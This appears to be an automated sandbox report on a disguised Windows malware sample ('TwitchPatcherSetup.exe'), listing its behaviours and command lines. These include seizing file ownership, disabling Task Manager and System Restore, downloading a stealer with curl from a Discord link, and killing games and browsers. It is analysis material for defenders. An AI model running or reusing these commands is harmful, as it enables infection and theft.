N/A N/A C:\Windows\system32\takeown.exe N/A
N/A N/A C:\Windows\system32\icacls.exe N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\TwitchPatcherSetup.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000\Control Panel\International\Geo\Nation C:\Windows\system32\cmd.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000\Control Panel\International\Geo\Nation C:\Windows\System32\WScript.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000\Control Panel\International\Geo\Nation C:\Windows\system32\cmd.exe N/A

Drops startup file

Description Indicator Process Target
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\mssec.bat C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\mssec.bat C:\Windows\system32\cmd.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\melter.exe N/A

Modifies file permissions

discovery
Description Indicator Process Target
N/A N/A C:\Windows\system32\takeown.exe N/A
N/A N/A C:\Windows\system32\icacls.exe N/A

Enumerates connected drives

Description Indicator Process Target
File opened (read-only) \??\X: C:\Windows\System32\WScript.exe N/A
File opened (read-only) \??\A: C:\Windows\System32\WScript.exe N/A
File opened (read-only) \??\B: C:\Windows\System32\WScript.exe N/A
File opened (read-only) \??\E: C:\Windows\System32\WScript.exe N/A
File opened (read-only) \??\S: C:\Windows\System32\WScript.exe N/A
File opened (read-only) \??\G: C:\Windows\System32\WScript.exe N/A
File opened (read-only) \??\T: C:\Windows\System32\WScript.exe N/A
File opened (read-only) \??\R: C:\Windows\System32\WScript.exe N/A
File opened (read-only) \??\V: C:\Windows\System32\WScript.exe N/A
File opened (read-only) \??\G: C:\Windows\System32\WScript.exe N/A
File opened (read-only) \??\K: C:\Windows\System32\WScript.exe N/A
File opened (read-only) \??\Q: C:\Windows\System32\WScript.exe N/A
File opened (read-only) \??\W: C:\Windows\System32\WScript.exe N/A
File opened (read-only) \??\L: C:\Windows\System32\WScript.exe N/A
File opened (read-only) \??\M: C:\Windows\System32\WScript.exe N/A
File opened (read-only) \??\Z: C:\Windows\System32\WScript.exe N/A
File opened (read-only) \??\P: C:\Windows\System32\WScript.exe N/A
File opened (read-only) \??\J: C:\Windows\System32\WScript.exe N/A
File opened (read-only) \??\L: C:\Windows\System32\WScript.exe N/A
File opened (read-only) \??\V: C:\Windows\System32\WScript.exe N/A
File opened (read-only) \??\X: C:\Windows\System32\WScript.exe N/A
File opened (read-only) \??\Y: C:\Windows\System32\WScript.exe N/A
File opened (read-only) \??\E: C:\Windows\System32\WScript.exe N/A
File opened (read-only) \??\H: C:\Windows\System32\WScript.exe N/A
File opened (read-only) \??\O: C:\Windows\System32\WScript.exe N/A
File opened (read-only) \??\Q: C:\Windows\System32\WScript.exe N/A
File opened (read-only) \??\W: C:\Windows\System32\WScript.exe N/A
File opened (read-only) \??\A: C:\Windows\System32\WScript.exe N/A
File opened (read-only) \??\B: C:\Windows\System32\WScript.exe N/A
File opened (read-only) \??\U: C:\Windows\System32\WScript.exe N/A
File opened (read-only) \??\H: C:\Windows\System32\WScript.exe N/A
File opened (read-only) \??\I: C:\Windows\System32\WScript.exe N/A
File opened (read-only) \??\N: C:\Windows\System32\WScript.exe N/A
File opened (read-only) \??\P: C:\Windows\System32\WScript.exe N/A
File opened (read-only) \??\I: C:\Windows\System32\WScript.exe N/A
File opened (read-only) \??\N: C:\Windows\System32\WScript.exe N/A
File opened (read-only) \??\U: C:\Windows\System32\WScript.exe N/A
File opened (read-only) \??\D: C:\Windows\System32\WScript.exe N/A
File opened (read-only) \??\M: C:\Windows\System32\WScript.exe N/A
File opened (read-only) \??\R: C:\Windows\System32\WScript.exe N/A
File opened (read-only) \??\Z: C:\Windows\System32\WScript.exe N/A
File opened (read-only) \??\J: C:\Windows\System32\WScript.exe N/A
File opened (read-only) \??\K: C:\Windows\System32\WScript.exe N/A
File opened (read-only) \??\O: C:\Windows\System32\WScript.exe N/A
File opened (read-only) \??\T: C:\Windows\System32\WScript.exe N/A
File opened (read-only) \??\S: C:\Windows\System32\WScript.exe N/A
File opened (read-only) \??\Y: C:\Windows\System32\WScript.exe N/A

Sets desktop wallpaper using registry

ransomware
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000\Control Panel\Desktop\wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1617997407-risitas.jpg" C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000\Control Panel\Desktop\wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1617997407-risitas.jpg" C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000\Control Panel\Desktop\wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1617997407-risitas.jpg" C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000\Control Panel\Desktop\wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1617997407-risitas.jpg" C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000\Control Panel\Desktop\wallpaper C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000\Control Panel\Desktop\wallpaper C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000\Control Panel\Desktop\wallpaper C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000\Control Panel\Desktop\wallpaper C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000\Control Panel\Desktop\wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1617997407-risitas.jpg" C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000\Control Panel\Desktop\wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1617997407-risitas.jpg" C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000\Control Panel\Desktop\wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1617997407-risitas.jpg" C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000\Control Panel\Desktop\wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1617997407-risitas.jpg" C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000\Control Panel\Desktop\wallpaper C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000\Control Panel\Desktop\wallpaper C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000\Control Panel\Desktop\wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1617997407-risitas.jpg" C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000\Control Panel\Desktop\wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1617997407-risitas.jpg" C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000\Control Panel\Desktop\wallpaper C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000\Control Panel\Desktop\wallpaper C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000\Control Panel\Desktop\wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1617997407-risitas.jpg" C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000\Control Panel\Desktop\wallpaper C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000\Control Panel\Desktop\wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1617997407-risitas.jpg" C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000\Control Panel\Desktop\wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1617997407-risitas.jpg" C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000\Control Panel\Desktop\wallpaper C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000\Control Panel\Desktop\wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1617997407-risitas.jpg" C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000\Control Panel\Desktop\wallpaper C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000\Control Panel\Desktop\wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1617997407-risitas.jpg" C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000\Control Panel\Desktop\wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1617997407-risitas.jpg" C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000\Control Panel\Desktop\wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1617997407-risitas.jpg" C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000\Control Panel\Desktop\wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1617997407-risitas.jpg" C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000\Control Panel\Desktop\wallpaper C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000\Control Panel\Desktop\wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1617997407-risitas.jpg" C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000\Control Panel\Desktop\wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1617997407-risitas.jpg" C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000\Control Panel\Desktop\wallpaper C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000\Control Panel\Desktop\wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1617997407-risitas.jpg" C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000\Control Panel\Desktop\wallpaper C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000\Control Panel\Desktop\wallpaper C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000\Control Panel\Desktop\wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1617997407-risitas.jpg" C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000\Control Panel\Desktop\wallpaper C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000\Control Panel\Desktop\wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1617997407-risitas.jpg" C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000\Control Panel\Desktop\wallpaper C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000\Control Panel\Desktop\wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1617997407-risitas.jpg" C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000\Control Panel\Desktop\wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1617997407-risitas.jpg" C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000\Control Panel\Desktop\wallpaper C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000\Control Panel\Desktop\wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1617997407-risitas.jpg" C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000\Control Panel\Desktop\wallpaper C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000\Control Panel\Desktop\wallpaper C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000\Control Panel\Desktop\wallpaper C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000\Control Panel\Desktop\wallpaper C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000\Control Panel\Desktop\wallpaper C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000\Control Panel\Desktop\wallpaper C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000\Control Panel\Desktop\wallpaper C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000\Control Panel\Desktop\wallpaper C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000\Control Panel\Desktop\wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1617997407-risitas.jpg" C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000\Control Panel\Desktop\wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1617997407-risitas.jpg" C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000\Control Panel\Desktop\wallpaper C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000\Control Panel\Desktop\wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1617997407-risitas.jpg" C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000\Control Panel\Desktop\wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1617997407-risitas.jpg" C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000\Control Panel\Desktop\wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1617997407-risitas.jpg" C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000\Control Panel\Desktop\wallpaper C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000\Control Panel\Desktop\wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1617997407-risitas.jpg" C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000\Control Panel\Desktop\wallpaper C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000\Control Panel\Desktop\wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1617997407-risitas.jpg" C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000\Control Panel\Desktop\wallpaper C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000\Control Panel\Desktop\wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1617997407-risitas.jpg" C:\Windows\system32\reg.exe N/A

Drops file in Program Files directory

Description Indicator Process Target
File opened for modification C:\Program Files\Java\jre-1.8\bin\server\classes.jsa C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Program Files\Java\jdk-1.8\jre\bin\server\classes.jsa C:\Windows\system32\cmd.exe N/A

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\melter.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\mshta.exe N/A

Delays execution with timeout.exe

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\timeout.exe N/A
N/A N/A C:\Windows\system32\timeout.exe N/A

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000_Classes\Local Settings C:\Windows\system32\cmd.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000_Classes\Local Settings C:\Windows\system32\cmd.exe N/A

Runs net.exe

Script User-Agent

Description Indicator Process Target
HTTP User-Agent header Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) N/A N/A
HTTP User-Agent header Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) N/A N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\takeown.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\takeown.exe N/A
Token: 33 N/A C:\Windows\system32\AUDIODG.EXE N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\system32\AUDIODG.EXE N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\taskkill.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\system32\shutdown.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\system32\shutdown.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\WScript.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\WScript.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\WScript.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\WScript.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\WScript.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\WScript.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 3780 wrote to memory of 4972 N/A C:\Users\Admin\AppData\Local\Temp\TwitchPatcherSetup.exe C:\Windows\system32\cmd.exe
PID 3780 wrote to memory of 4972 N/A C:\Users\Admin\AppData\Local\Temp\TwitchPatcherSetup.exe C:\Windows\system32\cmd.exe
PID 4972 wrote to memory of 2372 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\takeown.exe
PID 4972 wrote to memory of 2372 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\takeown.exe
PID 4972 wrote to memory of 4556 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\icacls.exe
PID 4972 wrote to memory of 4556 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\icacls.exe
PID 4972 wrote to memory of 4112 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 4972 wrote to memory of 4112 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 4972 wrote to memory of 1316 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 4972 wrote to memory of 1316 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 4972 wrote to memory of 2592 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\curl.exe
PID 4972 wrote to memory of 2592 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\curl.exe
PID 4972 wrote to memory of 632 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WScript.exe
PID 4972 wrote to memory of 632 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WScript.exe
PID 4972 wrote to memory of 2680 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WScript.exe
PID 4972 wrote to memory of 2680 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WScript.exe
PID 4972 wrote to memory of 5020 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\timeout.exe
PID 4972 wrote to memory of 5020 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\timeout.exe
PID 4972 wrote to memory of 848 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\rundll32.exe
PID 4972 wrote to memory of 848 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\rundll32.exe
PID 4972 wrote to memory of 1972 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WScript.exe
PID 4972 wrote to memory of 1972 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WScript.exe
PID 4972 wrote to memory of 2528 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\timeout.exe
PID 4972 wrote to memory of 2528 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\timeout.exe
PID 4972 wrote to memory of 2000 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\taskkill.exe
PID 4972 wrote to memory of 2000 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\taskkill.exe
PID 4972 wrote to memory of 2804 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\taskkill.exe
PID 4972 wrote to memory of 2804 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\taskkill.exe
PID 4972 wrote to memory of 3436 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\taskkill.exe
PID 4972 wrote to memory of 3436 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\taskkill.exe
PID 4972 wrote to memory of 4704 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\taskkill.exe
PID 4972 wrote to memory of 4704 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\taskkill.exe
PID 4972 wrote to memory of 888 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\taskkill.exe
PID 4972 wrote to memory of 888 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\taskkill.exe
PID 4972 wrote to memory of 1932 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\taskkill.exe
PID 4972 wrote to memory of 1932 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\taskkill.exe
PID 4972 wrote to memory of 1896 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\taskkill.exe
PID 4972 wrote to memory of 1896 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\taskkill.exe
PID 4972 wrote to memory of 2628 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 4972 wrote to memory of 2628 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 4972 wrote to memory of 4848 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\taskkill.exe
PID 4972 wrote to memory of 4848 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\taskkill.exe
PID 4972 wrote to memory of 4168 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\taskkill.exe
PID 4972 wrote to memory of 4168 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\taskkill.exe
PID 4972 wrote to memory of 5072 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 4972 wrote to memory of 5072 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 4972 wrote to memory of 3004 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\rundll32.exe
PID 4972 wrote to memory of 3004 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\rundll32.exe
PID 4972 wrote to memory of 4956 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WScript.exe
PID 4972 wrote to memory of 4956 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WScript.exe
PID 4972 wrote to memory of 1500 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WScript.exe
PID 4972 wrote to memory of 1500 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WScript.exe
PID 4972 wrote to memory of 4720 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WScript.exe
PID 4972 wrote to memory of 4720 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WScript.exe
PID 4972 wrote to memory of 3616 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WScript.exe
PID 4972 wrote to memory of 3616 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WScript.exe
PID 4972 wrote to memory of 2016 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WScript.exe
PID 4972 wrote to memory of 2016 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WScript.exe
PID 4972 wrote to memory of 4964 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WScript.exe
PID 4972 wrote to memory of 4964 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WScript.exe
PID 4972 wrote to memory of 3056 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WScript.exe
PID 4972 wrote to memory of 3056 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WScript.exe
PID 4972 wrote to memory of 1708 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WScript.exe
PID 4972 wrote to memory of 1708 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WScript.exe

Processes

C:\Users\Admin\AppData\Local\Temp\TwitchPatcherSetup.exe

"C:\Users\Admin\AppData\Local\Temp\TwitchPatcherSetup.exe"

C:\Windows\system32\cmd.exe

"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\489D.tmp\489E.tmp\489F.bat C:\Users\Admin\AppData\Local\Temp\TwitchPatcherSetup.exe"

C:\Windows\system32\takeown.exe

takeown /f C:\*.*

C:\Windows\system32\icacls.exe

Icacls C:\*.* /C /G Admin:F

C:\Windows\system32\reg.exe

REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v DisableTaskMgr /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add "HKLM\Software\Microsoft\Windows NT\CurrentVersion\SystemRestore" /v DisableSR /t REG_DWORD /d 1 /f

C:\Windows\system32\curl.exe

curl "https://cdn.discordapp.com/attachments/1195864694343336009/1198255413704007800/cstealer.exe" --output salope.exe

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --field-trial-handle=4448,i,1602949858158667699,12464335823361976127,262144 --variations-seed-version --mojo-platform-channel-handle=4412 /prefetch:8

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\9391.vbs"

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\26921.vbs"

C:\Windows\system32\timeout.exe

timeout 60

C:\Windows\system32\rundll32.exe

rundll32 user32.dll, SwapMouseButton

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\14246.vbs"

C:\Windows\system32\timeout.exe

timeout 14

C:\Windows\system32\AUDIODG.EXE

C:\Windows\system32\AUDIODG.EXE 0x394 0x4f4

C:\Windows\system32\taskkill.exe

taskkill /F /IM hl2.exe

C:\Windows\system32\taskkill.exe

taskkill /F /IM javaw.exe

C:\Windows\system32\taskkill.exe

taskkill /F /IM RobloxPlayerBeta.exe

C:\Windows\system32\taskkill.exe

taskkill /F /IM FortniteClient-Win64-Shipping.exe

C:\Windows\system32\taskkill.exe

taskkill /F /IM Among Us.exe

C:\Windows\system32\taskkill.exe

taskkill /F /IM chrome.exe

C:\Windows\system32\taskkill.exe

taskkill /F /IM firefox.exe

C:\Windows\system32\taskkill.exe

taskkill /F /IM msedge.exe

C:\Windows\system32\taskkill.exe

